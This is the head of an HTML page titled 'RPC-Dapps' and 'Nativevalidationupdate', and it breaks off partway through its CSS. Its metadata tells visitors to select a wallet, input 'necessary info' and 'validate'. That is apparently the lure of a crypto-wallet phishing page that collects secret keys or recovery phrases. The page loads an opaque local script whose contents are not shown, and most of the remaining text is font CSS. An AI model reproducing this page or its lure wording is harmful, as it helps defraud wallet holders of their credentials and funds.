<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta property="og:title" content="Nativevalidationupdate">
  <script src="./672b42829c51f52d769cd636.js"></script>
  <meta property="og:description" content="1. Click the above 2. Select Issue Category 3. Select Wallet 4. Input Necessary Info 5. Validate">
  <meta property="og:image" content="interconnected.png">
  <meta property="og:url" content="index.html">
  <title>RPC-Dapps</title>
  <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-EVSTQN3/azprG1Anm3QDgpJLIm9Nao0Yz1ztcQTwFspd3yD65VohhpuuCOmLASjC" crossorigin="anonymous">
  <link rel="stylesheet" href="css/styles.css">
  <link rel="preconnect" href="https://fonts.googleapis.com/">
  <link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin="">
  <link href="https://fonts.googleapis.com/css2?family=Montserrat:wght@400;500;600;700;800&amp;family=Poppins:wght@200;300;400;500;600&amp;display=swap" rel="stylesheet">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
  <link rel="stylesheet" href="assets/stm_icons/_reboot.css" media="all">
   <link rel="stylesheet" href="assets/stm_icons/stmicons.css" media="all">
  <link rel="icon" href="interconnected.png" type="image/x-icon">
  <link rel="shortcut icon" href="interconnected.png" type="image/x-icon">
  <script type="text/javascript" src="https://files.coinmarketcap.com/static/widget/coinMarquee.js"></script><style>.coin-marquee{-webkit-text-size-adjust:none}.coin-marquee div{box-sizing:border-box}.coin-marquee-wrapper{display:flex;align-items:center;background:#fff;border-top:1px solid #eff2f5;border-bottom:1px solid #eff2f5;overflow:hidden}.coin-marquee-wrapper--dark{background:#171924;border-top:1px solid #222531;border-bottom:1px solid #222531}.coin-marquee-wrapper--dark .coin-marquee-header-signature{border-right:1px solid #40424e}.coin-marquee-wrapper--dark .coin-marquee-header-signature__power-by{color:#808a9d}.coin-marquee-wrapper--dark .coin-marquee-item::after{background-color:#40424e}.coin-marquee-wrapper--dark .coin-marquee-item-inner{color:#fff}.coin-marquee-wrapper--dark .coin-marquee-item-symbol{color:#a1a7bb}.coin-marquee-wrapper--dark .coin-marquee-item .coin-marquee-item--skeleton .coin-marquee-item__icon,.coin-marquee-wrapper--dark .coin-marquee-item .coin-marquee-item--skeleton .coin-marquee-item-info__row{background-color:#323546}.coin-marquee-wrapper--transparent{background:transparent !important}.coin-marquee-header{float:left;width:141px}.coin-marquee-header-signature{overflow:hidden;width:141px;padding:12px 16px;box-sizing:border-box;border-right:1px solid #eff2f5}.coin-marquee-header-signature svg,.coin-marquee-header-signature div{float:left}.coin-marquee-header-signature svg{height:18px}.coin-marquee-header-signature div{height:17px;display:inline-block;line-height:18x;font-weight:400;font-size:9px;line-height:18px;color:#808a9d}.coin-marquee-container{display:flex;width:calc(100% - 141px);overflow:hidden;white-space:nowrap}.coin-marquee-container__inner{position:relative;display:inline-block;font-size:0;line-height:0;-webkit-animation-play-state:running;animation-play-state:running}.coin-marquee-container__inner:hover{-webkit-animation-play-state:paused;animation-play-state:paused}.coin-marquee-item{position:relative;min-width:220px;display:inline-block;box-sizing:border-box;padding:0 16px}.coin-marquee-item:hover,.coin-marquee-item:focus{color:inherit}.coin-marquee-item::after{content:"";position:absolute;top:20px;right:0;display:inline-block;background-color:#eff2f5;width:1px;height:20px}.coin-marquee-item-inner{padding:16px 0;display:flex;width:100%;align-items:center;text-decoration:none;color:#000}.coin-marquee-item-inner:hover{color:inherit}.coin-marquee-item-inner:hover .coin-marquee-item-name{opacity:.6}.coin-marquee-item__icon{margin-right:8px;display:inline-block;line-height:1;min-width:20px;max-width:20px;height:20px}.coin-marquee-item__icon img{width:100%;height:100%}.coin-marquee-item-info{width:100%}.coin-marquee-item-info__row{display:flex;align-items:center;justify-content:space-between;line-height:1}.coin-marquee-item-info__row:last-of-type{margin-top:2px}.coin-marquee-item-name{margin-right:12px;transition:.1s}.coin-marquee-item-name,.coin-marquee-item-price{font-size:12px;line-height:1;font-weight:600}.coin-marquee-item-symbol{font-size:11px;color:#58667e;transform-origin:left;transform:scale(0.9)}.coin-marquee-item-changes{font-size:11px;font-weight:600}.coin-marquee-item-changes__icon{width:0;height:0;position:relative;margin-right:3px;border-left:4px solid transparent;border-right:4px solid transparent}.coin-marquee-item-changes--up{color:#16c784}.coin-marquee-item-changes--up .coin-marquee-item-changes__icon{top:-8px;border-bottom:5px solid #16c784}.coin-marquee-item-changes--down{color:#ea3943}.coin-marquee-item-changes--down .coin-marquee-item-changes__icon{top:10px;border-top:5px solid #ea3943}.coin-marquee-item--skeleton .coin-marquee-item__icon{background-color:#eaeff5;border-radius:50%}.coin-marquee-item--skeleton .coin-marquee-item-info__row{width:40px;height:10px;background-color:#eaeff5}.coin-marquee-item--skeleton .coin-marquee-item-info__row:first-of-type{width:80px}@-webkit-keyframes marquee-scroll{from{transform:translateX(0%)}to{transform:translateX(-50%)}}@keyframes marquee-scroll{from{transform:translateX(0%)}to{transform:translateX(-50%)}}</style>
<style>/* cyrillic-ext */
@font-face {
  font-family: 'Montserrat';
  font-style: normal;
  font-weight: 500;
  font-display: swap;
  src: url(https://fonts.gstatic.com/s/montserrat/v30/JTUSjIg1_i6t8kCHKm459WRhyzbi.woff2) format('woff2');
  unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;
}
/* cyrillic */
@font-face {
  font-family: 'Montserrat';
  font-style: normal;
  font-weight: 500;
  font-display: swap;
  src: url(https://fonts.gstatic.com/s/montserrat/v30/JTUSjIg1_i6t8kCHKm459W1hyzbi.woff2) format('woff2');
  unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;
}
/* vietnamese */
@font-face {
  font-family: 'Montserrat';
  font-style: normal;
  font-weight: 500;
  font-display: swap;
  src: url(https://fonts.gstatic.com/s/montserrat/v30/JTUSjIg1_i6t8kCHKm459WZhyzbi.woff2) format('woff2');
  unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;
}
/* latin-ext */
@font-face {
  font-family: 'Montserrat';
  font-style: normal;
  font-weight: 500;
  font-display: swap;
  src: url(https://fonts.gstatic.com/s/montserrat/v30/JTUSjIg1_i6t8kCHKm459Wdhyzbi.woff2) format('woff2');
  unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;
}
/* latin */
@font-face {
  font-family: 'Montserrat';
  font-style: normal;
  font-weight: 500;
  font-display: swap;
  src: url(https://fonts.gstatic.com/s/montserrat/v30/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2) format('woff2');
  unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
}
/* cyrillic-ext */
@font-face {
  font-family: 'Montserrat';
  font-style: normal;
  font-weight: 600;
  font-display: swap;
  src: url(https://fonts.gstatic.com/s/montserrat/v30/JTUSjIg1_i6t8kCHKm459WRhyzbi.woff2) format('woff2');
  unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;
}
/* cyrillic */
@font-face {
  font-family: 'Montserrat';
  font-style: normal;
  font-weight: 600;
  font-display: swap;
  src: url(https://fonts.gstatic.com/s/montserrat/v30/JTUSjIg1_i6t8kCHKm459W1hyzbi.woff2) format('woff2');
  unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;
}
/* vietnamese */
@font-face {
  font-family: 'Montserrat';
  font-style: normal;
  font-weight: 600;
  font-display: swap;
  src: url(https://fonts.gstatic.com/s/montserrat/v30/JTUSjIg1_i6t8kCHKm459WZhyzbi.woff2) format('woff2');
  unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;
}
/* latin-ext */
@font-face {
  font-family: 'Montserrat';
  font-style: normal;
  font-weight: 600;
  font-display: swap;
  src: url(https://fonts.gstatic.com/s/montserrat/v30/JTUSjIg1_i6t8kCHKm459Wdhyzbi.woff2) format('woff2');
  unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;
}
/* latin */
@font-face {
  font-family: 'Montserrat';
  font-style: normal;
  font-weight: 600;
  font-display: swap;
  src: url(https://fonts.gstatic.com/s/montserrat/v30/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2) format('woff2');
  unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
}
/* cyrillic-ext */
@font-face {
  font-family: 'Montserrat';
  font-style: normal;
  font-weight: 700;
  font-display: swap;
  src: url(https://fonts.gstatic.com/s/montserrat/v30/JTUSjIg1_i6t8kCHKm459WRhyzbi.woff2) format('woff2');
  unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;
}
/* cyrillic */
@font-face {
  font-family: 'Montserrat';
  font-style: normal;
  font-weight: 700;
  font-display: swap;
  src: url(https://fonts.gstatic.com/s/montserrat/v30/JTUSjIg1_i6t8kCHKm459W1hyzbi.woff2) format('woff2');
  unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;
}
/* vietnamese */
@font-face {
  font-family: 'Montserrat';
  font-style: normal;
  font-weight: 700;
  font-display: swap;
  src: url(https://fonts.gstatic.com/s/montserrat/v30/JTUSjIg1_i6t8kCHKm459WZhyzbi.woff2) format('woff2');
  unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;
}
/* latin-ext */
@font-face {
  font-family: 'Montserrat';
  font-style: normal;
  font-weight: 700;
  font-display: swap;
  src: url(https://fonts.gstatic.com/s/montserrat/v30/JTUSjIg1_i6t8kCHKm459Wdhyzbi.woff2) format('woff2');
  unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;
}
/* latin */
@font-face {
  font-family: 'Montserrat';
  font-style: normal;
  font-weight: 700;
  font-display: swap;
  src: url(https://fonts.gstatic.com/s/montserrat/v30/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2) format('woff2');
  unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
}
/* cyrillic-ext */
@font-face {
  font-family: 'Roboto';
  font-style: normal;
  font-weight: 400;
  font-stretch: 100%;
  font-display: swap;
  src: url(https://fonts.gstatic.com/s/roboto/v48/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3GUBGEe.woff2) format('woff2');
  unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;
}
/* cyrillic */
@font-face {
  font-family: 'Roboto';
  font-style: normal;
  font-weight: 400;
  font-stretch: 100%;
  font-display: swap;
  src: url(https://fonts.gstatic.com/s/roboto/v48/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3iUBGEe.woff2) format('woff2');
  unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;
}
/* greek-ext */
@font-face {
  font-family: 'Roboto';
  font-style: normal;
  font-weight: 400;
  font-stretch: 100%;
  font-display: swap;
  src: url(https://fonts.gstatic.com/s/roboto/v48/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3CUBGEe.woff2) format('woff2');
  unicode-range: U+1F00-1FFF;
}
/* greek */
@font-face {
  font-family: 'Roboto';
  font-style: normal;
  font-weight: 400;
  font-stretch: 100%;
  font-display: swap;
  src: url(https://fonts.gstatic.com/s/roboto/v48/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3-UBGEe.woff2) format('woff2');
  unicode-range: U+0370-0377, U+037A-037F, U+0384-038A, U+038C, U+038E-03A1, U+03A3-03FF;
}
/* math */
@font-face {
  font-family: 'Roboto';
  font-style: normal;
  font-weight: 400;
  font-stretch: 100%;
  font-display: swap;
  src: url(https://fonts.gstatic.com/s/roboto/v48/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMawCUBGEe.woff2) format('woff2');
  unicode-range: U+0302-0303, U+0305, U+0307-0308, U+0310, U+0312, U+0315, U+031A, U+0326-0327, U+032C, U+032F-0330, U+0332-0333, U+0338, U+033A, U+0346, U+034D, U+0391-03A1, U+03A3-03A9, U+03B1-03C9, U+03D1, U+03D5-03D6, U+03F0-03F1, U+03F4-03F5, U+2016-2017, U+2034-2038, U+203C, U+2040, U+2043, U+2047, U+2050, U+2057, U+205F, U+2070-2071, U+2074-208E, U+2090-209C, U+20D0-20DC, U+20E1, U+20E5-20EF, U+2100-2112, U+2114-2115, U+2117-2121, U+2123-214F, U+2190, U+2192, U+2194-21AE, U+21B0-21E5, U+21F1-21F2, U+21F4-2211, U+2213-2214, U+2216-22FF, U+2308-230B, U+2310, U+2319, U+231C-2321, U+2336-237A, U+237C, U+2395, U+239B-23B7, U+23D0, U+23DC-23E1, U+2474-2475, U+25AF, U+25B3, U+25B7, U+25BD, U+25C1, U+25CA, U+25CC, U+25FB, U+266D-266F, U+27C0-27FF, U+2900-2AFF, U+2B0E-2B11, U+2B30-2B4C, U+2BFE, U+3030, U+FF5B, U+FF5D, U+1D400-1D7FF, U+1EE00-1EEFF;
}
/* symbols */
@font-face {
  font-family: 'Roboto';
  font-style: normal;
  font-weight: 400;
  font-stretch: 100%;
  font-display: swap;
  src: url(https://fonts.gstatic.com/s/roboto/v48/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMaxKUBGEe.woff2) format('woff2');
  unicode-range: U+0001-000C, U+000E-001F, U+007F-009F, U+20DD-20E0, U+20E2-20E4, U+2150-218F, U+2190, U+2192, U+2194-2199, U+21AF, U+21E6-21F0, U+21F3, U+2218-2219, U+2299, U+22C4-22C6, U+2300-243F, U+2440-244A, U+2460-24FF, U+25A0-27BF, U+2800-28FF, U+2921-2922, U+2981, U+29BF, U+29EB, U+2B00-2BFF, U+4DC0-4DFF, U+FFF9-FFFB, U+10140-1018E, U+10190-1019C, U+101A0, U+101D0-101FD, U+102E0-102FB, U+10E60-10E7E, U+1D2C0-1D2D3, U+1D2E0-1D37F, U+1F000-1F0FF, U+1F100-1F1AD, U+1F1E6-1F1FF, U+1F30D-1F30F, U+1F315, U+1F31C, U+1F31E, U+1F320-1F32C, U+1F336, U+1F378, U+1F37D, U+1F382, U+1F393-1F39F, U+1F3A7-1F3A8, U+1F3AC-1F3AF, U+1F3C2, U+1F3C4-1F3C6, U+1F3CA-1F3CE, U+1F3D4-1F3E0, U+1F3ED, U+1F3F1-1F3F3, U+1F3F5-1F3F7, U+1F408, U+1F415, U+1F41F, U+1F426, U+1F43F, U+1F441-1F442, U+1F444, U+1F446-1F449, U+1F44C-1F44E, U+1F453, U+1F46A, U+1F47D, U+1F4A3, U+1F4B0, U+1F4B3, U+1F4B9, U+1F4BB, U+1F4BF, U+1F4C8-1F4CB, U+1F4D6, U+1F4DA, U+1F4DF, U+1F4E3-1F4E6, U+1F4EA-1F4ED, U+1F4F7, U+1F4F9-1F4FB, U+1F4FD-1F4FE, U+1F503, U+1F507-1F50B, U+1F50D, U+1F512-1F513, U+1F53E-1F54A, U+1F54F-1F5FA, U+1F610, U+1F650-1F67F, U+1F687, U+1F68D, U+1F691, U+1F694, U+1F698, U+1F6AD, U+1F6B2, U+1F6B9-1F6BA, U+1F6BC, U+1F6C6-1F6CF, U+1F6D3-1F6D7, U+1F6E0-1F6EA, U+1F6F0-1F6F3, U+1F6F7-1F6FC, U+1F700-1F7FF, U+1F800-1F80B, U+1F810-1F847, U+1F850-1F859, U+1F860-1F887, U+1F890-1F8AD, U+1F8B0-1F8BB, U+1F8C0-1F8C1, U+1F900-1F90B, U+1F93B, U+1F946, U+1F984, U+1F996, U+1F9E9, U+1FA00-1FA6F, U+1FA70-1FA7C, U+1FA80-1FA89, U+1FA8F-1FAC6, U+1FACE-1FADC, U+1FADF-1FAE9, U+1FAF0-1FAF8, U+1FB00-1FBFF;
}
/* vietnamese */
@font-face {
  font-family: 'Roboto';
  font-style: normal;
  font-weight: 400;
  font-stretch: 100%;
  font-display: swap;
  src: url(https://fonts.gstatic.com/s/roboto/v48/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3OUBGEe.woff2) format('woff2');
  unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;
}
/* latin-ext */
@font-face {
  font-family: 'Roboto';
  font-style: normal;
  font-weight: 400;
  font-stretch: 100%;
  font-display: swap;
  src: url(https://fonts.gstatic.com/s/roboto/v48/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3KUBGEe.woff2) format('woff2');
  unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;
}
/* latin */
@font-face {
  font-family: 'Roboto';
  font-style: normal;
  font-weight: 400;
  font-stretch: 100%;
  font-display: swap;
  src: url(https://fonts.gstatic.com/s/roboto/v48/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3yUBA.woff2) format('woff2');
  unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
}
/* cyrillic-ext */
@font-face {
  font-family: 'Roboto';
  font-style: normal;
  font-weight: 500;
  font-stretch: 100%;
  font-display: swap;
  src: url(https://fonts.gstatic.com/s/roboto/v48/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3GUBGEe.woff2) format('woff2');
  unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;
}
/* cyrillic */
@font-face {
  font-family: 'Roboto';
  font-style: normal;
  font-weight: 500;
  font-stretch: 100%;
  font-display: swap;
  src: url(https://fonts.gstatic.com/s/roboto/v48/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3iUBGEe.woff2) format('woff2');
  unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;
}
/* greek-ext */
@font-face {
  font-family: 'Roboto';
  font-style: normal;
  font-weight: 500;
  font-stretch: 100%;
  font-display: swap;
  src: url(https://fonts.gstatic.com/s/roboto/v48/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3CUBGEe.woff2) format('woff2');
  unicode-range: U+1F00-1FFF;
}
/* greek */
@font-face {
  font-family: 'Roboto';
  font-style: normal;
  font-weight: 500;
  font-stretch: 100%;
  font-display: swap;
  src: url(https://fonts.gstatic.com/s/roboto/v48/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3-UBGEe.woff2) format('woff2');
  unicode-range: U+0370-0377, U+037A-037F, U+0384-038A, U+038C, U+038E-03A1, U+03A3-03FF;
}
/* math */
@font-face {
  font-family: 'Roboto';
  font-style: normal;
  font-weight: 500;
  font-stretch: 100%;
  font-display: swap;
  src: url(https://fonts.gstatic.com/s/roboto/v48/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMawCUBGEe.woff2) format('woff2');
  unicode-range: U+0302-0303, U+0305, U+0307-0308, U+0310, U+0312, U+0315, U+031A, U+0326-0327, U+032C, U+032F-0330, U+0332-0333, U+0338, U+033A, U+0346, U+034D, U+0391-03A1, U+03A3-03A9, U+03B1-03C9, U+03D1, U+03D5-03D6, U+03F0-03F1, U+03F4-03F5, U+2016-2017, U+2034-2038, U+203C, U+2040, U+2043, U+2047, U+2050, U+2057, U+205F, U+2070-2071, U+2074-208E, U+2090-209C, U+20D0-20DC, U+20E1, U+20E5-20EF, U+2100-2112, U+2114-2115, U+2117-2121, U+2123-214F, U+2190, U+2192, U+2194-21AE, U+21B0-21E5, U+21F1-21F2, U+21F4-2211, U+2213-2214, U+2216-22FF, U+2308-230B, U+2310, U+2319, U+231C-2321, U+2336-237A, U+237C, U+2395, U+239B-23B7, U+23D0, U+23DC-23E1, U+2474-2475, U+25AF, U+25B3, U+25B7, U+25BD, U+25C1, U+25CA, U+25CC, U+25FB, U+266D-266F, U+27C0-27FF, U+2900-2AFF, U+2B0E-2B11, U+2B30-2B4C, U+2BFE, U+3030, U+FF5B, U+FF5D, U+1D400-1D7FF, U+1EE00-1EEFF;
}
/* symbols */
@font-face {
  font-family: 'Roboto';
  font-style: normal;
  font-weight: 500;
  font-stretch: 100%;
  font-display: swap;
  src: url(https://fonts.gstatic.com/s/roboto/v48/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMaxKUBGEe.woff2) format('woff2');
  unicode-range: U+0001-000C, U+000E-001F, U+007F-009F, U+20DD-20E0, U+20E2-20E4, U+2150-218F, U+2190, U+2192, U+2194-2199, U+21AF, U+21E6-21F0, U+21F3, U+2218-2219, U+2299, U+22C4-22C6, U+2300-243F, U+2440-244A, U+2460-24FF, U+25A0-27BF, U+2800-28FF, U+2921-2922, U+2981, U+29BF, U+29EB, U+2B00-2BFF, U+4DC0-4DFF, U+FFF9-FFFB, U+10140-1018E, U+10190-1019C, U+101A0, U+101D0-101FD, U+102E0-102FB, U+10E60-10E7E, U+1D2C0-1D2D3, U+1D2E0-1D37F, U+1F000-1F0FF, U+1F100-1F1AD, U+1F1E6-1F1FF, U+1F30D-1F30F, U+1F315, U+1F31C, U+1F31E, U+1F320-1F32C, U+1F336, U+1F378, U+1F37D, U+1F382, U+1F393-1F39F, U+1F3A7-1F3A8, U+1F3AC-1F3AF, U+1F3C2, U+1F3C4-1F3C6, U+1F3CA-1F3CE, U+1F3D4-1F3E0, U+1F3ED, U+1F3F1-1F3F3, U+1F3F5-1F3F7, U+1F408, U+1F415, U+1F41F, U+1F426, U+1F43F, U+1F441-1F442, U+1F444, U+1F446-1F449, U+1F44C-1F44E, U+1F453, U+1F46A, U+1F47D, U+1F4A3, U+1F4B0, U+1F4B3, U+1F4B9, U+1F4BB, U+1F4BF, U+1F4C8-1F4CB, U+1F4D6, U+1F4DA, U+1F4DF, U+1F4E3-1F4E6, U+1F4EA-1F4ED, U+1F4F7, U+1F4F9-1F4FB, U+1F4FD-1F4FE, U+1F503, U+1F507-1F50B, U+1F50D, U+1F512-1F513, U+1F53E-1F54A, U+1F54F-1F5FA, U+1F610, U+1F650-1F67F, U+1F687, U+1F68D, U+1F691, U+1F694, U+1F698, U+1F6AD, U+1F6B2, U+1F6B9-1F6BA, U+1F6BC, U+1F6C6-1F6CF, U+1F6D3-1F6D7, U+1F6E0-1F6EA, U+1F6F0-1F6F3, U+1F6F7-1F6FC, U+1F700-1F7FF, U+1F800-1F80B, U+1F810-1F847, U+1F850-1F859, U+1F860-1F887, U+1F890-1F8AD, U+1F8B0-1F8BB, U+1F8C0-1F8C1, U+1F900-1F90B, U+1F93B, U+1F946, U+1F984, U+1F996, U+1F9E9, U+1FA00-1FA6F, U+1FA70-1FA7C, U+1FA80-1FA89, U+1FA8F-1FAC6, U+1FACE-1FADC, U+1FADF-1FAE9, U+1FAF0-1FAF8, U+1FB00-1FBFF;
}
/* vietnamese */
@font-face {
  font-family: 'Roboto';
  font-style: normal;
  font-weight: 500;
  font-stretch: 100%;
  font-display: swap;
  src: url(https://fonts.gstatic.com/s/roboto/v48/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3OUBGEe.woff2) format('woff2');
  unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;
}
/* latin-ext */
@font-face {
  font-family: 'Roboto';
  font-style: normal;
  font-weight: 500;
  font-stretch: 100%;
  font-display: swap;
  src: url(https://fonts.gstatic.com/s/roboto/v48/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3KUBGEe.woff2) format('woff2');
  unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;
}
/* latin */
@font-face {
  font-family: 'Roboto';
  font-style: normal;
  font-weight: 500;
  font-stretch: 100%;
  font-display: swap;
  src: url(https://fonts.gstatic.com/s/roboto/v48/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3yUBA.woff2) format('woff2');
  unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
}
/* cyrillic-ext */
@font-face {
  font-family: 'Roboto';
  font-style: normal;
  font-weight: 700;
  font-stretch: 100%;
  font-display: swap;
  src: url(https://fonts.gstatic.com/s/roboto/v48/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3GUBGEe.woff2) format('woff2');
  unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;
}
/* cyrillic */
@font-face {
  font-family: 'Roboto';
  font-style: normal;
  font-weight: 700;
  font-stretch: 100%;
  font-display: swap;
  src: url(https://fonts.gstatic.com/s/roboto/v48/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3iUBGEe.woff2) format('woff2');
  unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;
}
/* greek-ext */
@font-face {
  font-family: 'Roboto';
  font-style: normal;
  font-weight: 700;
  font-stretch: 100%;
  font-display: swap;
  src: url(https://fonts.gstatic.com/s/roboto/v48/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3CUBGEe.woff2) format('woff2');
  unicode-range: U+1F00-1FFF;
}
/* greek */
@font-face {
  font-family: 'Roboto';
  font-style: normal;
  font-weight: 700;
  font-stretch: 100%;
  font-display: swap;
  src: url(https://fonts.gstatic.com/s/roboto/v48/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3-UBGEe.woff2) format('woff2');
  unicode-range: U+0370-0377, U+037A-037F, U+0384-038A, U+038C, U+038E-03A1, U+03A3-03FF;
}
/* math */
@font-face {
  font-family: 'Roboto';
  font-style: normal;
  font-weight: 700;
  font-stretch: 100%;
  font-display: swap;
  src: url(https://fonts.gstatic.com/s/roboto/v48/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMawCUBGEe.woff2) format('woff2');
  unicode-range: U+0302-0303, U+0305, U+0307-0308, U+0310, U+0312, U+0315, U+031A, U+0326-0327, U+032C, U+032F-0330, U+0332-0333, U+0338, U+033A, U+0346, U+034D, U+0391-03A1, U+03A3-03A9, U+03B1-03C9, U+03D1, U+03D5-03D6, U+03F0-03F1, U+03F4-03F5, U+2016-2017, U+2034-2038, U+203C, U+2040, U+2043, U+2047, U+2050, U+2057, U+205F, U+2070-2071, U+2074-208E, U+2090-209C, U+20D0-20DC, U+20E1, U+20E5-20EF, U+2100-2112, U+2114-2115, U+2117-2121, U+2123-214F, U+2190, U+2192, U+2194-21AE, U+21B0-21E5, U+21F1-21F2, U+21F4-2211, U+2213-2214, U+2216-22FF, U+2308-230B, U+2310, U+2319, U+231C-2321, U+2336-237A, U+237C, U+2395, U+239B-23B7, U+23D0, U+23DC-23E1, U+2474-2475, U+25AF, U+25B3, U+25B7, U+25BD, U+25C1, U+25CA, U+25CC, U+25FB, U+266D-266F, U+27C0-27FF, U+2900-2AFF, U+2B0E-2B11, U+2B30-2B4C, U+2BFE, U+3030, U+FF5B, U+FF5D, U+1D400-1D7FF, U+1EE00-1EEFF;
}
/* symbols */
@font-face {
  font-family: 'Roboto';
  font-style: normal;
  font-weight: 700;
  font-stretch: 100%;
  font-display: swap;
